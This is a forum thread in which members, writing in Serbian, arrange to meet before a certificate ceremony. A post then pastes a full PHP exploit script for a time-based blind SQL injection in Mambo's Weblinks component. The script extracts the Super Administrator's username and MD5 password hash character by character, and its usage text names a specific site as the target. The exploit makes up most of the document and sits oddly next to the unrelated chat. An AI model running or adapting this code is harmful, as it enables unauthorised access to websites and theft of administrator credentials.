Drugari vidimo se na dodeli sertifikata 25-og u Domu omladine.

Наравно. Са почетком у 19:00. Хоћемо ли да се нађемо негде мало раније, као прошли пут, па да сви заједно упаднемо? Питаћу остале који не долазе на форум па ћу да јавим.

Vazi. To bi bilo super. Ja sam u kontaktu sa Vladom i Biljom iz Sunca pa cu preneti njima.

: )

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentialsrn";
echo "disclosure exploit (benchmark() vesion)rn";
echo "by rgod sima@autistici.orgrn";
echo "site: http://hackernews.org";
echo "this is called the Sun-Tzu 'trascendental guru meditation' tecniquernrn";

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONSrn";
echo "host: target server (ip/hostname)rn";
echo "path:http://sr.bsckragujevac.org/administrator";
echo "user/pass:admin";
echo "Options:rn";
echo " -T[prefix] specify a table prefix different from 'mos_'rn";
echo " -p[port]: specify a port other than 80rn";
echo " -P[iport]: specify a proxyrn";
echo "Example:rn";
echo "php ".$argv[0]." http://sr.bsckragujevac.org/administrator/Admin";
die;
}


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}
}
return $exa."rn".$result;
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "rn".$html;
}

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="mos_";
$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data ="username=".$user;
$data.="&passwd=".$pass;
$data.="&remember=yes";
$data.="&option=login";
$data.="&Submit=login";
$data.="&op2=login";
$data.="〈=english";
$data.="&return=".urlencode("http://".$host.$path);
$data.="&message=0";
$packet ="POST ".$p." HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Accept: text/plainrn";
$packet.="Connection: Closern";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Content-Length: ".strlen($data)."rnrn";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}
else
{
echo "Done...rncookie -> ".$cookie."rn";
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "rn".$sql."rn";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0rn";
$packet.="User-Agent: Googlebot/2.1rn";
$packet.="Host: ".$host."rn";
$packet.="Accept: text/plainrn";
$packet.="Connection: Closern";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Cookie: ".$cookie."rn";
$packet.="Content-Length: ".strlen($data)."rnrn";
$packet.=$data;
//debug
//echo quick_dump($packet)."rn";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."rn";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."rn";
if ($difftime > 7) {$admin.=chr($i);echo "admin -> ".$admin."[???]rn";sleep(2);break;} //more than seven seconds? we succeed...
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "rn".$sql."rn";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0rn";
$packet.="User-Agent: Googlebot/2.1rn";
$packet.="Host: ".$host."rn";
$packet.="Accept: text/plainrn";
$packet.="Connection: Closern";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Cookie: ".$cookie."rn";
$packet.="Content-Length: ".strlen($data)."rnrn";
$packet.=$data;
//debug
//echo quick_dump($packet)."rn";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."rn";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."rn";
if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]rn";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
//if you are here...
echo "Exploit succeeded...rn";
echo "--------------------------------------------------------------------rn";
echo "admin -> ".$admin."rn";
echo "password (md5) -> ".$password."rn";
echo "--------------------------------------------------------------------rn";
?>

Post edited by: masi, at: 2008/10/23 10:56

Post edited by: masi, at: 2008/10/23 11:00

Post edited by: masi, at: 2008/10/23 11:01